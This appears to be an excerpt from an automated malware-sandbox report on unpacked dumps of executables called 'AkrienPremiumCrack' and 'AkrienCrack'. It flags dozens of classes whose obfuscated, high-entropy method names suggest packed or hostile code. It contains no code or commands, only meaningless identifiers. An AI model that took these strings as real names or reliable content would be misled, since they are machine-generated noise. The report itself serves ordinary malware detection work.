            Source: 2.3.AkrienPremiumCrackByHurminka.exe.38de514.0.raw.unpack, B02ELaIHyNYx37398TN.csHigh entropy of concatenated method names: 'Js3IXFB90P', 'L3rVopFs5lQDfkXYgJn', 'y41DF8FPnnTmnSj4lN8', 'PqqwWFFe9lxMPQCfNQs', 'nj9Re2F030DSwpD4wt5', 'aHWZv9Fpjq8qIBZEnUk', 'BX0VBeFIEK4CL5d8NCe', 'de5xmyF62lup2BurZIl', 'qbOs41FwyyNIncFEUt1', 'f28'
            Source: 2.3.AkrienPremiumCrackByHurminka.exe.38de514.0.raw.unpack, jtclXbIcWHtj9H98E4J.csHigh entropy of concatenated method names: 'p23', 'YZ8', 'Gog', 'G9C', 'grnCuKFfsdmWLN2vetF', 'u4h1esFO7KIKna9EWfM', 'M22jkBFZ45sdjWxFh60', 'haIAKYFmnqmR2xTL6qj', 'BCmngnFoF6UDI94eP4R', 'xU2pVPFMqNBGIu6AqU0'
            Source: 2.3.AkrienPremiumCrackByHurminka.exe.38de514.0.raw.unpack, FY8bAijd1GJlElInOi.csHigh entropy of concatenated method names: '_52U', 'YZ8', 'M5A', 'G9C', 'L6hLIilN2p4Uswnw7K5', 'XpbcpxlqVDyFSAuV1kR', 'FHPiBSlhNe1V67xNYlP', 'SDtJwAl2lcQKm8J7I4Q', 'On8tYflXBeGdpBQZAch', 'l7mJQilEUWPbaVW46n0'
            Source: 2.3.AkrienPremiumCrackByHurminka.exe.38de514.0.raw.unpack, ye9QlDII98RjAVtaQsi.csHigh entropy of concatenated method names: 'tO4', 'YZ8', '_4kf', 'G9C', 'QNaL1f7peUtOVIgsjdf', 'piTBnd7IZOTm7tGlvEd', 'tpCbMg76n0BMEt8X9dr', 'MqlnQR7wVVGaxfwnrFq', 'amdlF17DpOK4TTPe9KF', 'gqJU2t78fKGOulFC16U'
            Source: 2.3.AkrienPremiumCrackByHurminka.exe.38de514.0.raw.unpack, SqLoqZINv6PvQK9n1UO.csHigh entropy of concatenated method names: 'YdLIoF0NxE', 'Q86W2Ic1I3xwuGtGJFD', 'ypHomPcHSOBRLl2lDYL', 'a1AFNHcDvVDD29bjFX7', 'hC9Lnwc8SIfsjJGyiJn', 'PqXoEFcrZOCRQVsYMbS', 'QLw', 'YZ8', 'cC5', 'G9C'
            Source: 2.3.AkrienPremiumCrackByHurminka.exe.38de514.0.raw.unpack, w2DVZ2m7nVbnyQU96SN.csHigh entropy of concatenated method names: '_3VT', 'O5t', '_1W5', 'BCQhxmpX6F', 'BOSjGulLli', 'VuJhaY4xt7', 'vu8janxOhP', 'ETtH568GsHoyrnjMcMa', 'fC6hlN8ujVe79GqbWJr', 'h2UhJF8ifJimH4bfgco'
            Source: 2.3.AkrienPremiumCrackByHurminka.exe.38de514.0.raw.unpack, POT7kvdFT1ybWG9Lo0M.csHigh entropy of concatenated method names: 'pVA75BGl4kxjaJSiF2k', 'Qmh5pOG7BEZFX0xa5pR', 'WIwmp7GdqCqi3EYd1PI', 'nswhnWGBOuV0Cjm2aKW', 'kC2cnyGWHdh1G8rxDgB', 'dR97jLGFEADebaygZ6v', 'mQMNTxGvi3ZIaS2rmy0'
            Source: 2.3.AkrienPremiumCrackByHurminka.exe.38de514.0.raw.unpack, a4XxB9LjNeoYSUK5n8v.csHigh entropy of concatenated method names: 'ICU', 'j9U', 'IBK', '_6qM', 'Amn', 'Mc2', 'og6', 'z6i', '_5G6', 'r11'
            Source: 2.3.AkrienPremiumCrackByHurminka.exe.38de514.0.raw.unpack, mFnnQgTPtQ1dmMXN68k.csHigh entropy of concatenated method names: '_0023Nn', 'Dispose', 'lrjdNAVrta', 'W85dSRwFnn', 'vgtd0Q1dmM', 'CN6dP8kqa1', 'nEgdFV5xR6', 'JbnCL9svubpWlby0unL', 'jefvUEscb83DlrvXhMQ', 'kwWhhPsWvW5r9DoNhms'
            Source: 2.3.AkrienPremiumCrackByHurminka.exe.38de514.0.raw.unpack, Q47HFs13FB90PXCOkD.csHigh entropy of concatenated method names: '_66K', 'YZ8', 'O46', 'G9C', 'XYtLEXBbTqGVymDa7No', 'VUJSibByulEv3jedjrB', 'JkSJFWBVYL4PERu6QBj', 'jnIE8iBjovfgyeJlUSI', 'YJOu1IBgfP0R94NpaKq', 'exJRoXBRJFvd2bRFNum'
            Source: 2.3.AkrienPremiumCrackByHurminka.exe.38de514.0.raw.unpack, OjtHy7Iss7HhFLUlmyk.csHigh entropy of concatenated method names: 'gHL', 'YZ8', 'vF9', 'G9C', 'us2A15F1BtTi212l23w', 'nBs1PSFHdxRVP9GGTG2', 'FMuCREFrvCEPoxQj3Lk', 'u3dPDwFx5xI5fBinXgD', 'S10sEHFkL5ojYKtIowU', 'YF3aY5F9M7pYXwmoYIT'
            Source: 2.3.AkrienPremiumCrackByHurminka.exe.38de514.0.raw.unpack, lt0AOneTit8C2R7imAK.csHigh entropy of concatenated method names: 'tAt5lZFHKw', 'TZf5Rn3wus', '_8r1', 'WnC5hafvBI', 'ehp5x4T0Cv', 'jWT5aZQohx', 'fn75uc4wE3', 'BLolPsCeQqys0xsvPrK', 'Iwq9GlC0OJrIgJtYIF6', 'u4mSJmCs2BMO1K4WSKl'
            Source: 2.3.AkrienPremiumCrackByHurminka.exe.38de514.0.raw.unpack, LG0FFseUAvWDn7fWWU1.csHigh entropy of concatenated method names: 'CGePeAnBnSkEyrc7551', 'I87MYPnliZhv5a4Cxma', 'h2Z3qdnJYh05spmahds', 'wnKh3vnd6lOePgrcxS6', 'EhdiNe6niA', 'WM4', '_499', 'TDviSvu5iu', 'y7ai08nxiY', 'NXHiPc5yTk'
            Source: 2.3.AkrienPremiumCrackByHurminka.exe.38de514.0.raw.unpack, z5EmUCLRACMfsx42tFp.csHigh entropy of concatenated method names: 'uxk', 'q7W', '_327', '_958', '_4Oz', 'r6z', 'r7o', 'Z83', 'L5N', 'VTw'
            Source: 2.3.AkrienPremiumCrackByHurminka.exe.38de514.0.raw.unpack, aCPkcGeAnaN6jeReSIt.csHigh entropy of concatenated method names: 'VPyc8kI43G', 'JVacgf0ysB', 'cq2cKfQDkQ', 'fmWcyoqB0s', 'tp6cZD1oND', 'DGGc7e2mCm', '_838', 'vVb', 'g24', '_9oL'
            Source: 2.3.AkrienPremiumCrackByHurminka.exe.38de514.0.raw.unpack, tvuesemHGfryK3qlacm.csHigh entropy of concatenated method names: 'zxCRWnZSN0', 'OuSRBiakXQ', 'ctuR2Pw95U', 'd5hJjrwnr81opXd38Xv', 'p9el1dwt8nUijWTl1YO', 'ArhWkYwTyyVd2rU5B6j', 'AtsCjGwAi59seUbZ6FV', 'ip7ReQSuB9', 'n3nRCS6Vw2', 'miaRlL5sL3'
            Source: 2.3.AkrienPremiumCrackByHurminka.exe.38de514.0.raw.unpack, vhnvwddN8IUSi3mZjvE.csHigh entropy of concatenated method names: 'BCncAxxH7V', 'gSXQjvU2H6Sp7TvQwEW', 'O5OZT9UqwuiXcLdLcYD', 'wehMbVUhGcRlpRnY2ct', 'EyIeNjUXESGncbhRatq', 'YqZDPmUE5tR6Pu8oWlj', 'i39DhYUzoPKSruy4BER'
            Source: 2.3.AkrienPremiumCrackByHurminka.exe.38de514.0.raw.unpack, K8DjBZLuminEjMcYHwx.csHigh entropy of concatenated method names: 'CU7aST9Vqu', 'U2ja0BGX3W', 'IKIaPqp0uQ', 'bruaFKYuA5', 'Bw6afFty5i', 'E6NKNiHE6PqX07Ipqtd', 'oSMygOHzfNNmtdi69VO', 'xePR8aH25dOTK6MhJiS', 'tawRNuHX8SaiZKLWsX7', 'qw5QHmrYRIA4q9kguJM'
            Source: 2.3.AkrienPremiumCrackByHurminka.exe.38de514.0.raw.unpack, QqUK2tIBPixp7mC29nj.csHigh entropy of concatenated method names: '_981', 'YZ8', 'd52', 'G9C', 'MDgNxwWMDIpNM2S6moM', 'SYd0xrWNnw5IITtjkUJ', 'O7EhTtWqv2qIZUmXAyn', 'O1Ioj4WhumV53anqd48', 'eHT2LTW2g47Rjm5mm26', 'jOfoRBWXURRrp5qG17C'
            Source: 2.3.AkrienPremiumCrackByHurminka.exe.38de514.0.raw.unpack, OyRyHZImVcS8foBJoD6.csHigh entropy of concatenated method names: 'R1x', 'YZ8', '_8U7', 'G9C', 'dmaBxQ7Lgp81ifl5SHx', 'jfQ8Hx74BY0Swf7jMe9', 'QalsMJ7SRcK9FtWGQUY', 'bOvTtq75DqaMlJ9QCCa', 'VWMfxF7aoAgf2VqGNBi', 'pYnsI47KICNus5F32TW'
            Source: 2.3.AkrienPremiumCrackByHurminka.exe.38de514.0.raw.unpack, F0MuSiLbakXQmtuPw95.csHigh entropy of concatenated method names: 'uOSuUrbFV1', 'R4KuNsufM9', 'DtwuSd0JQO', 'r9Lu0Dfn97', 'LBxuP2UIsF', 'VJ4GpwrKyqBgu4ccfQ1', 'QXrO1MridBcaAC6ONiY', 'T2yvkwr59AHcF9KPjIk', 'EPL8dvrae0ObbSAvMK9', 'W67MEOrUKgKycJuvPDX'
            Source: 2.3.AkrienPremiumCrackByHurminka.exe.38de514.0.raw.unpack, EBIa5RIPIWwUrJZqCpk.csHigh entropy of concatenated method names: 'E4kIjGKg53', 'soIOYHcU9o6aT9kwhhN', 's1KXaocGiYpqkxXDyVJ', 'AKspR9cKyFDjOujjob6', 'VPmPu7ciVJRyqrbYFuK', 'UK7UqwcuSUmLt8l9uQM', '_3Xh', 'YZ8', '_123', 'G9C'
            Source: 2.3.AkrienPremiumCrackByHurminka.exe.38de514.0.raw.unpack, IVr1gMLoJYnnyOVPjwf.csHigh entropy of concatenated method names: 'n23wjfMLUV', 'RgKwNSklpP', 'FiowSPBqlx', 'qHww09G1KE', 'ReRwPC1WdA', 'JejwFqBPTu', 'o9uwf1sXtB', 'HljwrvVY2i', 'eQpw1Y1QWx', 'WsDwqpZDFp'
            Source: 2.3.AkrienPremiumCrackByHurminka.exe.38de514.0.raw.unpack, WcFxRkMac7WnaYWutC.csHigh entropy of concatenated method names: '_468', 'YZ8', '_2M1', 'G9C', 'eFmUUQBsvbpeQPQKu8P', 'K1EcYwBPrMlvhxADZE3', 'grw1DJBpKmQVCa4QNVj', 'hQaCsUBIiQWhTLkXsb5', 'SBfO4rB6RNBaYxVHXSh', 'kafVtUBw1xVWQZ041y0'
            Source: 2.3.AkrienPremiumCrackByHurminka.exe.38de514.0.raw.unpack, WRmTQfeYJXDb8lvGAh0.csHigh entropy of concatenated method names: 'yyniRADUnR', 'DsmihSxNXv', 'x24ix8d1Ic', '_3Gf', '_4XH', '_3mv', '_684', '_555', 'Z9E', 'Ajxia2dWxX'
            Source: 2.3.AkrienPremiumCrackByHurminka.exe.38de514.0.raw.unpack, Pk709IIRX7ZoAbLRXmf.csHigh entropy of concatenated method names: '_3fO', 'YZ8', '_48A', 'G9C', 'oc2NjTWWLGRDd5lkf5c', 'STHST0WFySuMHyCgBaQ', 'YUXBoDWvGvyR4sirWmx', 'HNi7NaWc8WCUc8Hbrqn', 'XoBX5yWb3GfiGVo4ORG', 'U2VUPJWyadee0BUxRs8'
            Source: 2.3.AkrienPremiumCrackByHurminka.exe.38de514.0.raw.unpack, tX3jA7mtoua67GWyFfS.csHigh entropy of concatenated method names: 'cmelOrL9n4', 'sc6low5rsp', 'iRTl3MIwB7', 'oeUlkrf8Dj', 'oZml6inEjM', 'zhdvPAw7WKxEL8T1J2d', 'tx0Rm7wW2bS7cPWWBPE', 'xOcwlQwB0EHQtJAMcLQ', 'dO4ZZIwlmry9q149GpK', 'nOkh0kwF8RZFtxtGhbR'
            Source: 2.3.AkrienPremiumCrackByHurminka.exe.38de514.0.raw.unpack, EqCk0Id3jxhsIidHTnh.csHigh entropy of concatenated method names: 'BgQcLbM4yh', 's3ccdZ650a', 'hywceBSNmv', 'mTEcC1sUKL', 'tRWcllARaZ', 'OhOcREkv2y', 'wdUchHVrps', 'lk5cxU2c7e', 'nX9caN7GLg', 'Mixcu8OeWf'
            Source: 2.3.AkrienPremiumCrackByHurminka.exe.38de514.0.raw.unpack, O54hIOdm6syBaileAkZ.csHigh entropy of concatenated method names: 'XHfTRw5DpSekGvSWpEj', 'gTK8YO58qoU7ojum1iw', 'eErvlH56f6oY1H2RPvp', 'ncfr5P5whAcyOFABYhJ', 'jhWVvTi8py', 'XZG1ad5ryTdcQi29GZa', 'wKMcdu5x5GSPlVXvFJs', 'GKHlGM51T1TDNgXvcTK', 'VlaODO5HWQ7NS6MbnZn', 'GYFrog5kIZ3a3NpX6gN'
            Source: 2.3.AkrienPremiumCrackByHurminka.exe.38de514.0.raw.unpack, Va5IdLI44eTxiHJCW89.csHigh entropy of concatenated method names: 'kNf', 'YZ8', 'U31', 'G9C', 'BLWcZqFK7UCfWjICT8F', 'LFuEVgFiFhPHMU1y21t', 'ht3RMIFUxv0qvQW0Xdv', 'gJRvELFGQF1BVpuZ2vP', 'qAgSq6FuvpHQbftdCbU', 'Mt2W9MFCp984a2Xdvpu'
            Source: 2.3.AkrienPremiumCrackByHurminka.exe.38de514.0.raw.unpack, U72LEYyfa1Haovmiyr.csHigh entropy of concatenated method names: 'kcq', 'YZ8', '_4bQ', 'G9C', 'Prgv8Ul7PnPsTTkHmu5', 'EsiRwmlWocbUvKmC8q4', 'ETdi0olFqlU8CV0LPli', 'e1UcTFlviohuyDTci0w', 'S3bU5slcRMR3Svhnbfi', 'uEMh9tlbJyxkm1I2500'
            Source: 2.3.AkrienPremiumCrackByHurminka.exe.38de514.0.raw.unpack, zKSKo9myl7tHvjy5fSj.csHigh entropy of concatenated method names: '_9YY', '_57I', 'w51', 'WPXj04EdmH', '_168', 'Ig6xdI8Hfv3Zq38o0qU', 'CopK9h8rM4xJfXf3FoQ', 'bOOB2N8x8MlFCwteoxa', 'c6EYdD8klldeDIJ7p59', 'jBknYY89Mu1gLnLcJwG'
            Source: 2.3.AkrienPremiumCrackByHurminka.exe.38de514.0.raw.unpack, K9aengmMa7W2JgrH1pn.csHigh entropy of concatenated method names: '_5u9', 'dHejyULTSj', 'tAHhAiTDe1', 'Nq1ju8iXpP', 'rwyhVWD2NpDS2YKpjig', 'qUZS6HDXGLUav671dOX', 'yeUSaHDEOuqNEE2H7J3', 'xNQBjWDqg0M4LNivi0m', 'krhTMmDhdsv5y2Pq89q', 'mp1fPBDze0kUnJdaUQg'
            Source: 2.3.AkrienPremiumCrackByHurminka.exe.38de514.0.raw.unpack, JePjb1Pt64aGmvkx76.csHigh entropy of concatenated method names: '_59M', 'YZ8', '_1zA', 'G9C', 'j9s5hGdi5fNm82djq6Q', 'YsuMNPdUcLKIwlykR8t', 'cAL9V7dG3Fo496p4tcG', 'IEB4XNduq1Z4YtIBh3E', 'auCdfodC2lds9j6q1Hb', 'qBiIZbdtFptPTPkHmUH'
            Source: 2.3.AkrienPremiumCrackByHurminka.exe.38de514.0.raw.unpack, uGHFG3LiPNHRYkRDi6c.csHigh entropy of concatenated method names: 'P8B9Uk5IB0', 'r089NwLshe', 'Hqy9SBk4Qh', 'aHr90uEHsV', 'xLQ9PA4JW4', 'pDQL3DxpMJelHWEsUn8', 'ogXZKqxs7sZmYc81uJv', 'EjWClwxPQHFUGXsCuYR', 'TsNlKSxIyspY453Q59W', 'Y3xCHix6lF17VLZ6Slg'
            Source: 2.3.AkrienPremiumCrackByHurminka.exe.38de514.0.raw.unpack, WXMkOM5NJNougT0fGw.csHigh entropy of concatenated method names: 'nBbNooVcX', 'PnhSH5Yi5', 'vuX0wpUsT', 'Xe8oQk3GyxpcxyLadh7', 'AgQpEv3iFJHlVmLn26F', 'lbKrPJ3UHQsbOjE5473', 'CxxNfC3uT9VcCbA2FLN', 'meHnTW3CbSUHkNLElYi', 'wkrr3s3tnKFfGkUONXw', 'gLxG3y3TB9RrIDKxbsZ'
            Source: 2.3.AkrienPremiumCrackByHurminka.exe.38de514.0.raw.unpack, Igd2vxmIHZi2nY6jRPd.csHigh entropy of concatenated method names: 'wsXCX6CPDN', 'FKnCnV7yt6', 'j5eCp74MGg', 'zMGCE2oc3o', 'x9JD8dPzgbf2X0bNjt0', 'nInhCoPXVjxnBw4hfi9', 'YJaqrXPElHcNKEtUdcM', 'u0yPpypY4NORujuCnbE', 'SH1Gpwp37eFpEnYC1E2', 'T92AAZpJDjVioYkH6lM'
            Source: 2.3.AkrienPremiumCrackByHurminka.exe.38de514.0.raw.unpack, rwEgZheplS3itYinwqW.csHigh entropy of concatenated method names: '_159', 'rI9', '_2Cj', 'tlXicWugdu', 'O0Hi5JUouR', 'pG9iiECUPy', 'XiciGAEsHj', 'PJxiYnGsi1', 'Bb1iXsBHSj', 'wZemubTU7VubJag8WnQ'
            Source: 2.3.AkrienPremiumCrackByHurminka.exe.38de514.0.raw.unpack, eyIXJ5diuvIdTgxq3sZ.csHigh entropy of concatenated method names: 'Ik7vFoAKrl', 'u4NvfugrNZ', 'HM1vr3Lo2N', 'lkZv1wklpb', 'beRvq2muWE', 'PnE830Ukx9FeNlO2ake', 'kjAsswUr3cuM71eK7Lr', 'N21kSZUxJjCa64sJI0U', 'kvqfMUU9QgLBno9Kmi1', 'sJJ6IFUL7e27B8bXMG5'
            Source: 2.3.AkrienPremiumCrackByHurminka.exe.38de514.0.raw.unpack, NBehHxdR59aGcu7ddk7.csHigh entropy of concatenated method names: 'vA1vVcu6og', 'uapvb7WnY6', 'pK7pMEiNhGTb1iMHTDK', 'yT0ymUiq7bKvDR6LBCm', 'bGOk0HihUATtDACU1tP', 'UWI18oi24jy6nCdx9ul', 'xVI2cNiXWJGnjjsRMXf', 'N3LGejiEvauIvqx2tyN', 'ixUM0xizPcaiUMmPGWj', 'wPA94kUYBNhcoCMt37v'
            Source: 2.3.AkrienPremiumCrackByHurminka.exe.38de514.0.raw.unpack, nEH65XTQxcn8ISe2sPE.csHigh entropy of concatenated method names: 'UcELb47wKH', 'MFZLsKFHnu', 'SbNLQuPuhY', 'FAOL4xeLnF', 'rigLvA5Gtu', 'pkcvc9eYntj9FJYhuwe', 'WNQgjxe3oAP8431i2Di', 'awiXGbRE6CMrlr9bXUD', 'e1JGbNRzITDaNXr88SN', 'BrpuIJeJ1RX7XElZf7R'
            Source: 2.3.AkrienPremiumCrackByHurminka.exe.38de514.0.raw.unpack, TpSFP7fnJV099EZ6QF.csHigh entropy of concatenated method names: '_23T', 'YZ8', 'ELp', 'G9C', 'kap6gXdh76VZAtsb2L7', 'FcNqpld20YMeENn94dA', 'bto8tEdXOtqkqAikywt', 'xdpP8cdEHQ1BIaWuJYN', 'Pr28ssdzL3SgCfQuRIH', 'ftDAvGBYp4N4wmyRmfa'
            Source: 2.3.AkrienPremiumCrackByHurminka.exe.38de514.0.raw.unpack, IMxKL9TACBKEt4IJShy.csHigh entropy of concatenated method names: 'IjPTcJ2yve', 'Q7fT5Q4yby', 'aVQTiNZKZn', 'qlngspy5aaCfIv4YFH3', 'XkaEetyaYklXI6sPyu2', 'TosoxJyKHvrd1L8L7x9', 'JoQASDyiGeB5G8S3CLV', 'IkbLE0yUasNSLechgFb', 'hVMRRDyGceNq60xuh03', 'LwyM1Py4nGYYEnABYpD'
            Source: 2.3.AkrienPremiumCrackByHurminka.exe.38de514.0.raw.unpack, Qwlb79I7RZAV2xNM4K2.csHigh entropy of concatenated method names: '_7v4', 'YZ8', '_888', 'G9C', 'GTnP25bSK1MwrxZ9hGO', 'xwnsj7b5tpd6UkP6UOb', 'l79eCMba76dMiFgq6NM', 'jl6ddjbKe1CRYJlH5ww', 'ugaqG5biKDcbsbOj38b', 'aBqoI4bUEBMXMe7qqAa'
            Source: 2.3.AkrienPremiumCrackByHurminka.exe.38de514.0.raw.unpack, rXs0YCIn5MVX9jwHFAG.csHigh entropy of concatenated method names: 'QMeI83LrNM', 'xBZ4eucJ2kbK3sTJLQ1', 'w098Iscdi9GYBtFBlxy', 'gMgOd0cY8MQwSwiygq1', 'jdNmwGc3sUVxeU5yE21', 'rgYC08cBGWm5aJY24EY', 'Q8WFg1clS2yesR6bMEI', 'pfI4uQc7JBd8mKoP4CX', 'svtIK281xy', 'ooUVjocvWqlSMalpBP8'
            Source: 2.3.AkrienPremiumCrackByHurminka.exe.38de514.0.raw.unpack, KM9ntwe4d0JQOH9LDfn.csHigh entropy of concatenated method names: 'IGD', 'CV5', 'DRB5vlFl7u', '_3k4', 'elq', 'hlH', 'yc1', 'Y17', '_2QC', 'En1'
            Source: 2.3.AkrienPremiumCrackByHurminka.exe.38de514.0.raw.unpack, TfwPTxUENEcUIJC4tM.csHigh entropy of concatenated method names: 'g25', 'YZ8', '_23T', 'G9C', 'LH2qy8uLC', 'kBDyGBJKmytMJLYwoYT', 'JE8KyKJiFuwP8NyAU5T', 'i5giYNJU5mO4prcpAA1', 'afucKiJGnwUZGFixkHZ', 'iKEe3YJuaTUI6rtR5b6'
            Source: 2.3.AkrienPremiumCrackByHurminka.exe.38de514.0.raw.unpack, yQxUDoGjSN6MownrtR.csHigh entropy of concatenated method names: 'T43', 'YZ8', '_56i', 'G9C', 'zTSwDIJbU0JGcakdB0k', 'IIXdQAJyemQL03KV1la', 'cgpMZCJVbKRwWl2PNEw', 'Aoe25IJjAUyQL3Sh2kM', 'khbBS0JgtfcF5WSJdLD', 'HSEIeDJRFoWT44rF1HN'
            Source: 2.3.AkrienPremiumCrackByHurminka.exe.38de514.0.raw.unpack, EJRVEyprgdxVpJXC3O.csHigh entropy of concatenated method names: '_52Y', 'YZ8', 'Eg4', 'G9C', 'IC1fdwnAh', 'P7kLNlJpePgplP0tHGA', 'YIuGa0JIAQ3T5MHVNPJ', 'MZHBR1J6kBoC7EBRt1K', 'eitafUJwxDPHT5cAQWJ', 'jsBnyyJDvkyE7i31FKY'
            Source: 2.3.AkrienPremiumCrackByHurminka.exe.38de514.0.raw.unpack, cupOOgmu6jCnlwctGXW.csHigh entropy of concatenated method names: '_223', 'TXxMxy6s3O3ciAtUXNR', 'qDTIiQ6PIHBA5BaiMp6', 'P5poB06pWjh5260SE8a', 'YhyvNQ6I9svyeJZ5f80', 'JWyrtd66BiLwrnKEW6n', 'zuxKEL6wt5XvJwGifSx', 'FW5OR06Di9BBjil9AR7', 'UrBNUZ68b9totyGipDg', 'S0qBYu61xjCbOoDRMVE'
            Source: 2.3.AkrienPremiumCrackByHurminka.exe.38de514.0.raw.unpack, VMnMMmd6skwxkSRV6L0.csHigh entropy of concatenated method names: 'q4Y', '_71O', '_6H6', 'bH1c420nxJ', '_13H', 'I64', '_67a', '_71t', 'fEj', '_9OJ'
            Source: 2.3.AkrienPremiumCrackByHurminka.exe.38de514.0.raw.unpack, NsqC7TmzaBcHs5P93Bq.csHigh entropy of concatenated method names: 'hVAhG4XxB9', 'GeohYYSUK5', 'C8vhXk9aAX', 'HLDuoT1tBh03PeZKdGX', 'ioY53J1TTPk6ebDvhgB', 'T3qTfw1u78OlrZaGsXy', 'cTu0dn1CZDShEZmZ5Mg', 'eBTDM81nBXW7vwicrnY', 'gxAagh1AQiGiJuFW0bx', 'uMa6e61QBOPbj82y6Kr'
            Source: 2.3.AkrienPremiumCrackByHurminka.exe.38de514.0.raw.unpack, OxHtQZe0x2Kotq3yDoI.csHigh entropy of concatenated method names: 'tARYPl4Zq4', 'hbo9iInLhfmEwan3I9K', 'TxcZ7Dn45qZt8owHpbW', 'z2TdtGnkDFZemUTDLId', 'DceJh6n9twgeAurQ6ot', '_1fi', 'VeGG7XLMBV', '_676', 'IG9', 'mdP'
            Source: 2.3.AkrienPremiumCrackByHurminka.exe.38de514.0.raw.unpack, A7NSCtIi9qOJ5eGf4IU.csHigh entropy of concatenated method names: 'Ai7', 'YZ8', '_56U', 'G9C', 'TWfj6HFEPV12SKcMA4O', 'fKrHupFz8AbIgIL9tL6', 'dZdWEOvYc6IJVPwqkMv', 'btRxRMv3llNDe6gKbnb', 'pxhll8vJ30F6Dp5DG3O', 'SZePEivdAP1aoiTxw48'
            Source: 2.3.AkrienPremiumCrackByHurminka.exe.38de514.0.raw.unpack, wfvJRJmsvYgcdxD4n4s.csHigh entropy of concatenated method names: '_525', 'L97', '_3t2', 'UL2', '_6V2', '_968', 's9n6n5DjpvcHomhhLsF', 'IcDbASDgAmCItHswTW1', 'VV817tDRYNSDD9vRFfk', 'Drcy7jDePJISl5aq6lR'
            Source: 2.3.AkrienPremiumCrackByHurminka.exe.38de514.0.raw.unpack, j9T5G9TDKuGCN3ie2Mu.csHigh entropy of concatenated method names: 'ebeCcKw4RU', 'IWTg65PmDwBJJXSKSWA', 'NS23BgPOWF7G9U0DX5G', 'aHgBkFPZnrOhEQtMoEc', 'pZ7tDIPodoWkNkubUkP', 'mJGQTKPM4T2GrJhgXu4', 'hdoCJ1e9vg', 'Eo9CH3xZw0', 'vyJCVJmBAw', 'DD1CbhdKeW'
            Source: 2.3.AkrienPremiumCrackByHurminka.exe.38de514.0.raw.unpack, rJnOUEIu4FQpGUR7CcZ.csHigh entropy of concatenated method names: 'd43', 'YZ8', 'g67', 'G9C', 'MST3wCWxtbQj0rZqOrP', 'l1Eek7WkL1wFWVDLhLg', 'x1ao1hW9Iq6wrCLPFQu', 'wksqHWWL8bEB4bQrS8o', 'fcedxuW4kNg48gjfL63', 'xKOPlXWSfmtC6w6cEmt'
            Source: 2.3.AkrienPremiumCrackByHurminka.exe.38de514.0.raw.unpack, WAeOCAeZKTBo5c1jjgw.csHigh entropy of concatenated method names: 'TQ1XQlRcL2', '_1kO', '_9v4', '_294', 'ABlX4Jj3cg', 'euj', 'oJtXvKpFl4', 'uobXc6jCYq', 'o87', 'ipBX54uqmn'
            Source: 2.3.AkrienPremiumCrackByHurminka.exe.38de514.0.raw.unpack, VdJwLKTVvdS3WU3eRl4.csHigh entropy of concatenated method names: 'IljL9PMxKL', 'lCBLwKEt4I', 'gKdmjwR1O4QuGx6cilL', 'x2Y7xPRHS1PPOwdvJMK', 'dwL1VIRDyo3A1TjDfDK', 'VAcrbdR8FEjqfBTVFpn', 'vcvt64Rrn4hnqoIAwb9', 'vGtyelRx4nrrjYivOXo', 'VZeuInRkfrtXVqh9RcQ', 'SbiXQpR9mpjMVO1kZU7'
            Source: 2.3.AkrienPremiumCrackByHurminka.exe.38de514.0.raw.unpack, KLU84FLdtog4Jnardem.csHigh entropy of concatenated method names: 'jpPa2TNOyC', 'gqDBuVHPv3ccaxX2QBH', 'DnRQxLHp8eNkRG8GQte', 'U6BgUNH0eLnlpVJUxIv', 'RjExutHskOMKhtmcFBF', 'KolhnTmhpW', 'XkPhpwkrBC', 'J3thEqrI3r', 'V7ThUdrPC7', 'YlFhNBdWKX'
            Source: 2.3.AkrienPremiumCrackByHurminka.exe.38de514.0.raw.unpack, dcdj5kTTpP3o9ZEKVF4.csHigh entropy of concatenated method names: 'hUxTKkJJWJ', 'rVYTy02ELa', 'RNYTZx3739', 'OTNT7SKTsh', 'bDPTOTdoEs', 'zV0TobcytH', 'vL3rYBVs6kNw1XJNKSk', 'aGdRuuVPIOyd89tRoRF', 's5SDW9VeyEWScdqaf7n', 'Y2LmTuV0l7B3pfYB0fb'
            Source: 5.3.AkrienCrack.exe.4bc350d.1.raw.unpack, xIT5YmIg81BwKELfqgQ.csHigh entropy of concatenated method names: 'aC6Txtrw6W', 'YNqTagSm2k', 'OcqRIwbyYOCp99QUyjw', 'fMxeKjbceUSuw7VMb8T', 'OI37axbbNToKhWeijLn', 'Q5GOAFbVYjP5JS8HK88', 'adI5HKbjYBVF7c1lYMK', 'Bj4y4BbgSyVfk1gsmfs', 'aZ6aC0bRAf2BLxakB2Y', 'Y5vVavbebKLZWLuydC9'
            Source: 5.3.AkrienCrack.exe.4bc350d.1.raw.unpack, vxIWZ2mvRGvZl5SgiHJ.csHigh entropy of concatenated method names: 'rXbREpPqx3', 'RKxRUXleJE', 'Nerb6fDPtI2ho5SJOCT', 'A1DQkpDpvQIefPnHdWh', 'cwI8aND03hbDWq4NtwQ', 'nLo5fPDsQA73wCchXPa', 'G1OcFjDI7hu4BHW0rLl', 'hXDcMYD6nNJahOPrRuR'
            Source: 5.3.AkrienCrack.exe.4bc350d.1.raw.unpack, vNULWuT2mnfUhyGDvVO.csHigh entropy of concatenated method names: 'wK2mjSFlIW', 'DoPmDtVcEB', 'NCwAmhgpmUEl7pdrpbw', 'ld8dr5gIrxAh2TCwXBM', 'UP0G6Tg6bGPLN9vS4qV', 'tXjSYWgwhsESLOdFZqf', 'BS6p1vgDdwGMWw3s0Hf', 'Rcpqsmg8nV1c5hfVG1g', 'JXmYXeg1wn5NjK6PRPx', 'y9OrsZgHaiqHWIFUn4Z'
            Source: 5.3.AkrienCrack.exe.4bc350d.1.raw.unpack, HubuWUCxinHEtH6L3g2.csHigh entropy of concatenated method names: 'cWSQFZooFoBrU', 'pXX3kFQRIdXtm34Rni8', 'lcerWcQeQ2wpI80ygdQ', 'qgLJtwQ0Mm86GZI4ioN', 'qrpShFQsnCTE9xpl337', 'hfMw93QPf9H3yUCOqQK', 'LNHoQdQjPMUi9u52fhv', 'lpIWtQQg04tHsJ9bAxP', 'spgiX0QpTeMYBLQ9ArC', 't8fYKUQIFYmMyfCAZ8Y'
            Source: 5.3.AkrienCrack.exe.4bc350d.1.raw.unpack, IqcmvwdncZ0sNPSCbVR.csHigh entropy of concatenated method names: 'w6kvKilV1r', 'WY4vymYypY', 'bMGvZOItjo', 'j7Q9hbUC7iUhJbfS5I1', 'zcwxOTUGn9AXFuV287h', 'IUtp0eUuyuvY7Sahs6h', 'vjtYyrUtpvyuVBeWGax', 'oqrSHdUTroKdOFeJctN', 'UY0AvJUn9MTVQiRABix', 'pijxvFUA8nI9H2ZDdlB'
